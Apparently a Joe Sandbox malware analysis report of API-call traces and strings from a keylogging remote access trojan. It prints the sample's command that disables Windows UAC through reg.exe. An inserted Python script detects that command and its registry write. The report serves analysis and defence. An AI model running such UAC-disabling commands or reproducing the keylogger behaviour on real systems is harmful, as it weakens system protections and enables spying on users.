                                                  • Opcode Fuzzy Hash: 578fdff71443f11c3fca357d736e88dc82f16117349863ef7b695c473245d396
                                                  • Instruction Fuzzy Hash: C2F0C2325002146BD2116B24FC49EBF3AACDB45BA1B04003AFA06A21D2DB28CE4685F8
                                                  APIs
                                                  • RegQueryInfoKeyW.ADVAPI32(?,?,?,00000000,?,?,?,?,?,?,?,?), ref: 00412A1D
                                                  • RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,?,?,?,?,00000000,?,?,?,?), ref: 00412A4C
                                                  • RegEnumValueW.ADVAPI32(?,00000000,?,?,00000000,?,?,00002710,?,?,?,00000000,?,?,?,?), ref: 00412AED
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                   • Associated: 00000000.00000002.2294667849.0000000000473000.00000040.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.2294667849.0000000000476000.00000040.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Enum$InfoQueryValue
                                                  • String ID: [regsplt]$DG
                                                  • API String ID: 3554306468-1089238109
                                                  • Opcode ID: 5048a897bec4a4ac36c0964d4dcd002e21d0293fd50c5bb6c8eb0160b70f3baa
                                                  • Instruction ID: 09469598a034e88a10af8fecb22bb8a395a4bc85e225d04bcc93034602455e52
                                                  • Opcode Fuzzy Hash: 5048a897bec4a4ac36c0964d4dcd002e21d0293fd50c5bb6c8eb0160b70f3baa
                                                  • Instruction Fuzzy Hash: D8512E72108345AFD310EB61D995DEFB7ECEF84744F00493EB585D2191EB74EA088B6A
                                                  APIs
                                                    • Part of subcall function 02101900: TerminateProcess.KERNEL32(00000000,?,020FC8E4), ref: 02101910
                                                    • Part of subcall function 02101900: WaitForSingleObject.KERNEL32(000000FF,?,020FC8E4), ref: 02101923
                                                    • Part of subcall function 021028C4: RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,?,00000208), ref: 021028E0
                                                    • Part of subcall function 021028C4: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,00000000), ref: 021028F9
                                                    • Part of subcall function 021028C4: RegCloseKey.ADVAPI32(?), ref: 02102904
                                                  • GetModuleFileNameW.KERNEL32(00000000,?,00000208), ref: 020FC92E
                                                  • ShellExecuteW.SHELL32(00000000,0046559C,00000000,00465900,00465900,00000000), ref: 020FCA8D
                                                  • ExitProcess.KERNEL32 ref: 020FCA99
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2295418897.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_20f0000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Process$CloseExecuteExitFileModuleNameObjectOpenQueryShellSingleTerminateValueWait
                                                  • String ID: @CG$exepath
                                                  • API String ID: 1913171305-1253070338
                                                  • Opcode ID: 7fefd4fcae7e0ef6d55ce9d204f1d3822a483be89a92adb2579d4a357fc0ee6e
                                                  • Instruction ID: ddac374bf571a9649e9f9664db80820a722e37e2f0e4ef195d2ac38283339c64
                                                  • Opcode Fuzzy Hash: 7fefd4fcae7e0ef6d55ce9d204f1d3822a483be89a92adb2579d4a357fc0ee6e
                                                  • Instruction Fuzzy Hash: A141B2329803185EDB94FB60DC50EFE737AAF50700F10007AEE06A7995EF246E46DE95
                                                  APIs
                                                  • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\yPIOW6yoPi.exe,00000104), ref: 0213297B
                                                  • _free.LIBCMT ref: 02132A46
                                                  • _free.LIBCMT ref: 02132A50
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2295418897.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_20f0000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: _free$FileModuleName
                                                  • String ID: C:\Users\user\Desktop\yPIOW6yoPi.exe$h'X
                                                  • API String ID: 2506810119-3952049375
                                                  • Opcode ID: 037ffcd8ae4620a35ea0d85ea656a28a2901847f16e257e4da60b9a7372ecd68
                                                  • Instruction ID: 4586c06f5089a32e0a27d225e7dc2ef765d2d79e054ce2780aa4c4bdbf091298
                                                  • Opcode Fuzzy Hash: 037ffcd8ae4620a35ea0d85ea656a28a2901847f16e257e4da60b9a7372ecd68
                                                  • Instruction Fuzzy Hash: 12319371A80218AFDB33EF99DC84A9EBBFEEF85320B104066ED04A7210D7719E41CB50
                                                  APIs
                                                    • Part of subcall function 00433519: RtlEnterCriticalSection.KERNEL32(00470D18,00475B70,00475BF0,?,0040179E,00475BF0), ref: 00433524
                                                    • Part of subcall function 00433519: RtlLeaveCriticalSection.KERNEL32(00470D18,?,0040179E,00475BF0), ref: 00433561
                                                    • Part of subcall function 004338A5: __onexit.LIBCMT ref: 004338AB
                                                  • __Init_thread_footer.LIBCMT ref: 0040AEA7
                                                    • Part of subcall function 004334CF: RtlEnterCriticalSection.KERNEL32(00470D18,00475BF0,?,004017C1,00475BF0,00000000), ref: 004334D9
                                                    • Part of subcall function 004334CF: RtlLeaveCriticalSection.KERNEL32(00470D18,?,004017C1,00475BF0,00000000), ref: 0043350C
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                   • Associated: 00000000.00000002.2294667849.0000000000473000.00000040.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.2294667849.0000000000476000.00000040.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CriticalSection$EnterLeave$Init_thread_footer__onexit
                                                  • String ID: [End of clipboard]$[Text copied to clipboard]$,]G$0]G
                                                  • API String ID: 2974294136-753205382
                                                  • Opcode ID: 27177344db3f65c8a7f19ff2323e9f3f7e3a193126b178a4bad76e333529366b
                                                  • Instruction ID: 172b4b58ae75f988d3b3a293bba3f35c56e57800f0e036023c2a0486d145437f
                                                  • Opcode Fuzzy Hash: 27177344db3f65c8a7f19ff2323e9f3f7e3a193126b178a4bad76e333529366b
                                                  • Instruction Fuzzy Hash: 44219F31A002099ACB14FB75D8929EE7774AF54318F50403FF406771E2EF386E4A8A8D
                                                  APIs
                                                  • GetLocalTime.KERNEL32(?,Offline Keylogger Started,004740F8), ref: 0040A884
                                                  • wsprintfW.USER32 ref: 0040A905
                                                    • Part of subcall function 00409D58: SetEvent.KERNEL32(00000000,?,00000000,0040A91C,00000000), ref: 00409D84
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                   • Associated: 00000000.00000002.2294667849.0000000000473000.00000040.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.2294667849.0000000000476000.00000040.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: EventLocalTimewsprintf
                                                  • String ID: [%04i/%02i/%02i %02i:%02i:%02i $Offline Keylogger Started$]
                                                  • API String ID: 1497725170-248792730
                                                  • Opcode ID: d47f6fbfcddc5f950be7bc6af301cd0dd5aecde9aff08f33bdbb9e4de45e3f1a
                                                  • Instruction ID: 8a7b6ca92c081f7f17d03b5bac770d689c192d548357e869dbc211d44db93d1d
                                                  • Opcode Fuzzy Hash: d47f6fbfcddc5f950be7bc6af301cd0dd5aecde9aff08f33bdbb9e4de45e3f1a
                                                  • Instruction Fuzzy Hash: BB118172400118AACB18BB56EC55CFE77BCAE48325F00013FF842620D1EF7C5A86C6E9
                                                  APIs
                                                  • CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,00409E6F), ref: 00409DCD
                                                  • GetFileSize.KERNEL32(00000000,00000000,?,?,?,00409E6F), ref: 00409DDC
                                                  • Sleep.KERNEL32(00002710,?,?,?,00409E6F), ref: 00409E09
                                                  • CloseHandle.KERNEL32(00000000,?,?,?,00409E6F), ref: 00409E10
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                   • Associated: 00000000.00000002.2294667849.0000000000473000.00000040.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.2294667849.0000000000476000.00000040.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: File$CloseCreateHandleSizeSleep
                                                  • String ID: `AG
                                                  • API String ID: 1958988193-3058481221
                                                  • Opcode ID: d7248f5b3272c1b8e158f3ed59b8642bc51f6090f2ebac6ec2a2f06e31ed32df
                                                  • Instruction ID: 61dc848fc85204ea7fc5a67171cad01df1347b3512dd41eabc6ad436608203b4
                                                  • Opcode Fuzzy Hash: d7248f5b3272c1b8e158f3ed59b8642bc51f6090f2ebac6ec2a2f06e31ed32df
                                                  • Instruction Fuzzy Hash: 3A11C4303407406AE731E764E88962B7A9AAB91311F44057EF18562AE3D7389CD1829D
                                                  APIs
                                                  • CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,020FA0D6), ref: 020FA034
                                                  • GetFileSize.KERNEL32(00000000,00000000,?,?,?,020FA0D6), ref: 020FA043
                                                  • Sleep.KERNEL32(00002710,?,?,?,020FA0D6), ref: 020FA070
                                                  • CloseHandle.KERNEL32(00000000,?,?,?,020FA0D6), ref: 020FA077
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2295418897.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_20f0000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: File$CloseCreateHandleSizeSleep
                                                  • String ID: `AG
                                                  • API String ID: 1958988193-3058481221
                                                  • Opcode ID: d7248f5b3272c1b8e158f3ed59b8642bc51f6090f2ebac6ec2a2f06e31ed32df
                                                  • Instruction ID: 85a091870c34b81a14558e658f1e8dd7d0423adcaeae007477e0606e9053cfda
                                                  • Opcode Fuzzy Hash: d7248f5b3272c1b8e158f3ed59b8642bc51f6090f2ebac6ec2a2f06e31ed32df
                                                  • Instruction Fuzzy Hash: 06113D303803406EDBF1A724F88CA3F3B96AB89315F440528F38942D92C765A8C4D769
                                                  APIs
                                                  • RegisterClassExA.USER32(00000030), ref: 0041CA6C
                                                  • CreateWindowExA.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,000000FD,00000000,00000000,00000000), ref: 0041CA87
                                                  • GetLastError.KERNEL32 ref: 0041CA91
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                   • Associated: 00000000.00000002.2294667849.0000000000473000.00000040.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.2294667849.0000000000476000.00000040.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ClassCreateErrorLastRegisterWindow
                                                  • String ID: 0$MsgWindowClass
                                                  • API String ID: 2877667751-2410386613
                                                  • Opcode ID: 8e3fabf9294f4d788ff0190a2140b1e52dfb9086da58b750c2f99102573e0e65
                                                  • Instruction ID: bff961279ea7560c1ff94ea7b7e8445e3758215821d07408c43b005d8adda241
                                                  • Opcode Fuzzy Hash: 8e3fabf9294f4d788ff0190a2140b1e52dfb9086da58b750c2f99102573e0e65
                                                  • Instruction Fuzzy Hash: 2D01E9B1D1431EAB8B01DFE9DCC4AEFBBBDBE49255B50452AE410B2200E7704A448BA5
                                                  APIs
                                                  • RegisterClassExA.USER32(00000030), ref: 0210CCD3
                                                  • CreateWindowExA.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,000000FD,00000000,00000000,00000000), ref: 0210CCEE
                                                  • GetLastError.KERNEL32 ref: 0210CCF8
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2295418897.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_20f0000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ClassCreateErrorLastRegisterWindow
                                                  • String ID: 0$MsgWindowClass
                                                  • API String ID: 2877667751-2410386613
                                                  • Opcode ID: 8e3fabf9294f4d788ff0190a2140b1e52dfb9086da58b750c2f99102573e0e65
                                                  • Instruction ID: ec2689304769dc44e7400c558afef8ec8856332e52b8e2bf17b40b15b91643e1
                                                  • Opcode Fuzzy Hash: 8e3fabf9294f4d788ff0190a2140b1e52dfb9086da58b750c2f99102573e0e65
                                                  • Instruction Fuzzy Hash: DB0129B1D1421EAB8B00DFD9DDC4AEFBBBDBE49255B50462AF400B2140E7B04A448FA0
                                                  APIs
                                                  • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,00000000,00000000,?,0213741E,?,00000000,00000000,00000000,?,0213774A,00000006,0045D330), ref: 021374A9
                                                  • GetLastError.KERNEL32(?,0213741E,?,00000000,00000000,00000000,?,0213774A,00000006,0045D330,0045D328,0045D330,00000000,00000364,?,021371F8), ref: 021374B5
                                                  • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,0213741E,?,00000000,00000000,00000000,?,0213774A,00000006,0045D330,0045D328,0045D330,00000000), ref: 021374C3
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2295418897.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_20f0000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: LibraryLoad$ErrorLast
                                                  • String ID: #v
                                                  • API String ID: 3177248105-554117064
                                                  • Opcode ID: ae052748fea16bfd64aed14cfe47709c8c773e0353203442da9e9610ebb1fa47
                                                  • Instruction ID: fc285bfbec7bc75e7f670cb664d47da4892a2071e61de883d815e56f6500d545
                                                  • Opcode Fuzzy Hash: ae052748fea16bfd64aed14cfe47709c8c773e0353203442da9e9610ebb1fa47
                                                  • Instruction Fuzzy Hash: 4401FC72A55327AFC7324A78BC44E56BFD9AF05BB2B114930F91AD31C1D720E801CAE4
                                                  APIs
                                                  • CreateProcessA.KERNEL32(C:\Windows\System32\cmd.exe,/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f,00000000,00000000,00000000,08000000,00000000,00000000,?,?), ref: 00406A00
                                                  • CloseHandle.KERNEL32(?), ref: 00406A0F
                                                  • CloseHandle.KERNEL32(?), ref: 00406A14
                                                  Strings
                                                  • C:\Windows\System32\cmd.exe, xrefs: 004069FB
                                                  • /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f, xrefs: 004069F6
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2294667849.0000000000473000.00000040.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2294667849.0000000000476000.00000040.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CloseHandle$CreateProcess
                                                  • String ID: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f$C:\Windows\System32\cmd.exe
                                                  • API String ID: 2922976086-4183131282
                                                  • Opcode ID: eb4121427644dbe92f0faf5bfcaaefbe4213ddeedd11a12955cf8af7f240737c
                                                  • Instruction ID: 91eee74bc7ca160cae255ad37e89f65ee2415c19472677646c1a5aeb81073604
                                                  • Opcode Fuzzy Hash: eb4121427644dbe92f0faf5bfcaaefbe4213ddeedd11a12955cf8af7f240737c
                                                  • Instruction Fuzzy Hash: 8AF030B69002A9BACB30ABD69C0EFDF7F7DEBC6B11F00042AB615A6051D6745144CAB9
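The command line in the entry above turns UAC off by writing EnableLUA=0 under HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System through a cmd.exe /k wrapper around reg.exe; because the key lives under HKLM, the write only succeeds from an elevated process. The following detection is an added example, not part of the Joe Sandbox report and not code from the sample: it flags the process-creation command line (including spelling variants of the same reg.exe invocation) and, independently, the resulting registry value write, and runs over a handful of constructed events whose field names (EventID, CommandLine, TargetObject, Details) are assumed to follow Sysmon's Event ID 1 and Event ID 13 layout.

```python
"""Detect attempts to disable UAC by setting EnableLUA to 0.

Added example for the report above; it is not the sample's code and not
part of Joe Sandbox. Event field names are assumed to match Sysmon
(EventID 1: CommandLine; EventID 13: TargetObject, Details).
"""
import re
from typing import Dict, Iterable, List, Tuple

# Key and value written by the sample (from the CreateProcessA string above).
UAC_POLICY_KEY = r"SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System"
UAC_VALUE = "EnableLUA"
# Only the HKLM copy of the policy key is effective; HKCU writes are ignored.
_HKLM_PREFIXES = ("hklm\\", "hkey_local_machine\\", "\\registry\\machine\\")

# reg.exe ADD against the policy key that sets EnableLUA to zero.
# Tolerates "reg" vs "reg.exe", a leading path or %windir%, a cmd.exe /k or
# /c wrapper, a quoted key, either order of /t and /d, and 0 / 00 / 0x0.
_REG_ADD_ENABLELUA = re.compile(
    r'\breg(?:\.exe)?\s+add\s+"?(?:HKLM|HKEY_LOCAL_MACHINE)\\'
    + re.escape(UAC_POLICY_KEY)
    + r'"?(?=.*\s/v\s+EnableLUA\b)(?=.*\s/d\s+"?(?:0x)?0+\b)',
    re.IGNORECASE,
)


def is_uac_disable_commandline(cmdline: str) -> bool:
    """True if the command line runs reg.exe ADD to set EnableLUA to 0."""
    return _REG_ADD_ENABLELUA.search(" ".join(cmdline.split())) is not None


def _parse_reg_dword(details: str):
    """Extract the DWORD from Sysmon-style 'DWORD (0x00000000)' or a bare number."""
    m = re.search(r"0x([0-9a-f]+)|\b(\d+)\b", details, re.IGNORECASE)
    if m is None:
        return None
    return int(m.group(1), 16) if m.group(1) is not None else int(m.group(2))


def is_uac_disable_registry_write(target_object: str, details: str) -> bool:
    """True if a registry write sets HKLM\\...\\Policies\\System\\EnableLUA to 0."""
    path = target_object.replace("/", "\\").rstrip("\\")
    parent, _, value = path.rpartition("\\")
    parent_l = parent.lower()
    if value.lower() != UAC_VALUE.lower():
        return False
    if not parent_l.startswith(_HKLM_PREFIXES):
        return False
    if not parent_l.endswith(UAC_POLICY_KEY.lower()):
        return False
    return _parse_reg_dword(details) == 0


def scan_events(events: Iterable[Dict[str, object]]) -> List[Tuple[int, str]]:
    """Return (event index, reason) for every event that looks like a UAC disable."""
    hits: List[Tuple[int, str]] = []
    for i, ev in enumerate(events):
        if ev.get("EventID") == 1 and is_uac_disable_commandline(str(ev.get("CommandLine", ""))):
            hits.append((i, "process: reg.exe ADD sets EnableLUA=0"))
        elif ev.get("EventID") == 13 and is_uac_disable_registry_write(
            str(ev.get("TargetObject", "")), str(ev.get("Details", ""))
        ):
            hits.append((i, "registry: EnableLUA written as 0"))
    return hits


# Constructed sample events (not sandbox output). Index 0 is the exact command
# line from the report as cmd.exe receives it; 4 is the registry write it causes.
_POLICY_VALUE = r"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA"
SAMPLE_EVENTS = [
    {"EventID": 1, "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"C:\Windows\System32\cmd.exe /k %windir%\System32\reg.exe ADD "
                    r"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System "
                    r"/v EnableLUA /t REG_DWORD /d 0 /f"},
    {"EventID": 1, "Image": r"C:\Windows\System32\reg.exe",      # benign query
     "CommandLine": r"reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA"},
    {"EventID": 1, "Image": r"C:\Windows\System32\reg.exe",      # quoted key, swapped flags, 0x0
     "CommandLine": r'reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" '
                    r"/d 0x0 /t REG_DWORD /v enablelua /f"},
    {"EventID": 1, "Image": r"C:\Windows\System32\reg.exe",      # re-enables UAC, must not fire
     "CommandLine": r"reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 1 /f"},
    {"EventID": 13, "Image": r"C:\Windows\System32\reg.exe",
     "TargetObject": _POLICY_VALUE, "Details": "DWORD (0x00000000)"},
    {"EventID": 13, "Image": r"C:\Windows\System32\svchost.exe",  # other value in the same key
     "TargetObject": _POLICY_VALUE.replace("EnableLUA", "ConsentPromptBehaviorAdmin"),
     "Details": "DWORD (0x00000005)"},
]

if __name__ == "__main__":
    for idx, reason in scan_events(SAMPLE_EVENTS):
        print(f"event {idx}: {reason}")
```

The command-line check only covers reg.exe, which is what this sample spawns; the registry-write check is the more general of the two because it also catches the same change made through PowerShell, a .reg import or a direct RegSetValueEx call, and it stays quiet on a plain query or on a write that sets the value back to 1. Note that a change to EnableLUA only takes effect after a reboot, so the write itself is the thing to alert on.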
                                                  APIs
                                                  • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,0044258A,?,?,0044252A,?), ref: 004425F9
                                                  • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0044260C
                                                  • FreeLibrary.KERNEL32(00000000,?,?,?,0044258A,?,?,0044252A,?), ref: 0044262F
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2294667849.0000000000473000.00000040.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2294667849.0000000000476000.00000040.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: AddressFreeHandleLibraryModuleProc
                                                  • String ID: CorExitProcess$mscoree.dll
                                                  • API String ID: 4061214504-1276376045
                                                  • Opcode ID: 84f8467b83475f4999ab7b265d6d7c22c059d91a263d45f4d19e228ed4a2ac86
                                                  • Instruction ID: 32bca75c9846dbfd0145c2b425e1dcbc158e0b1ec8d75d3d798e8c7ef3c4518a
                                                  • Opcode Fuzzy Hash: 84f8467b83475f4999ab7b265d6d7c22c059d91a263d45f4d19e228ed4a2ac86
                                                  • Instruction Fuzzy Hash: 14F04430904209FBDB169FA5ED09B9EBFB5EB08756F4140B9F805A2251DF749D40CA9C
                                                  APIs
                                                  • RegCreateKeyW.ADVAPI32(80000001,00000000,BG), ref: 021029E6
                                                  • RegSetValueExW.ADVAPI32(BG,?,00000000,00000001,00000000,00000000,004742F8,?,020FE832,pth_unenc,004742E0), ref: 02102A14
                                                  • RegCloseKey.ADVAPI32(?,?,020FE832,pth_unenc,004742E0), ref: 02102A1F
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2295418897.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_20f0000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CloseCreateValue
                                                  • String ID: pth_unenc$BG
                                                  • API String ID: 1818849710-2233081382
                                                  • Opcode ID: f3f4d92ea395f83514c7fc898d5ccc6e166341d4c45edfed3dd661c905dadffd
                                                  • Instruction ID: 4a58e285af4cf6e091ca1e0c9c141e40e66ce85f2ce2d800e637db0901a7a040
                                                  • Opcode Fuzzy Hash: f3f4d92ea395f83514c7fc898d5ccc6e166341d4c45edfed3dd661c905dadffd
                                                  • Instruction Fuzzy Hash: A6F06D72580218BFDF509BA4ED59FEE376DEB01B80F004524FA02AA4A1EB71DA04DA50
                                                  APIs
                                                  • GetStdHandle.KERNEL32(000000F5,00000000,?,?,?,?,?,?,0041BF02), ref: 0041BE79
                                                  • GetConsoleScreenBufferInfo.KERNEL32(00000000,?,?,?,?,?,?,?,0041BF02), ref: 0041BE86
                                                  • SetConsoleTextAttribute.KERNEL32(00000000,0000000C,?,?,?,?,?,?,0041BF02), ref: 0041BE93
                                                  • SetConsoleTextAttribute.KERNEL32(00000000,?,?,?,?,?,?,?,0041BF02), ref: 0041BEA6
                                                  Strings
                                                  • ______ (_____ \ _____) )_____ ____ ____ ___ ___ | __ /| ___ | \ / ___) _ \ /___)| | \ \| ____| | | ( (__| |_| |___ ||_| |_|_____)_|_|_|\____)___/(___/ , xrefs: 0041BE99
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2294667849.0000000000473000.00000040.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2294667849.0000000000476000.00000040.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Console$AttributeText$BufferHandleInfoScreen
                                                  • String ID: ______ (_____ \ _____) )_____ ____ ____ ___ ___ | __ /| ___ | \ / ___) _ \ /___)| | \ \| ____| | | ( (__| |_| |___ ||_| |_|_____)_|_|_|\____)___/(___/
                                                  • API String ID: 3024135584-2418719853
                                                  • Opcode ID: ebe4511383e55350cb7437214035f9f9245c880b4d311b5a557d4aca1c5ac6fb
                                                  • Instruction ID: 2ebb83c1e7e70c4501562f07591cf8b091918c9767bda4cb27a2f29097fd03e7
                                                  • Opcode Fuzzy Hash: ebe4511383e55350cb7437214035f9f9245c880b4d311b5a557d4aca1c5ac6fb
                                                  • Instruction Fuzzy Hash: C7E04F62104348ABD31437F5BC8ECAB3B7CE784613B100536F612903D3EA7484448A79
                                                  APIs
                                                  • GetModuleHandleA.KERNEL32(User32.dll,GetCursorInfo), ref: 0040143A
                                                  • GetProcAddress.KERNEL32(00000000), ref: 00401441
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2294667849.0000000000473000.00000040.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2294667849.0000000000476000.00000040.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: AddressHandleModuleProc
                                                  • String ID: GetCursorInfo$User32.dll$`#v
                                                  • API String ID: 1646373207-1032071883
                                                  • Opcode ID: f39e1638c21b7beb4c7105e5daed03b820dcbd0345c10e5d325762a4e30a7452
                                                  • Instruction ID: fea3bfcfa5ad703f85b7dd8d5f3eac54d033561bc9bd2fc33d3800e380b32b62
                                                  • Opcode Fuzzy Hash: f39e1638c21b7beb4c7105e5daed03b820dcbd0345c10e5d325762a4e30a7452
                                                  • Instruction Fuzzy Hash: 51B092B868A3059BC7306BE0BD0EA093B24EA44703B1000B2F087C12A1EB7880809A6E
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2294667849.0000000000473000.00000040.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2294667849.0000000000476000.00000040.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 540239c3c7a8b78e424bcf486381df198cb5d8aead86a72beee1c9aef6a9193c
                                                  • Instruction ID: 5f24fa964153eb206603784754227e3bedeb81a57cd12874f4c303f17d5dd595
                                                  • Opcode Fuzzy Hash: 540239c3c7a8b78e424bcf486381df198cb5d8aead86a72beee1c9aef6a9193c
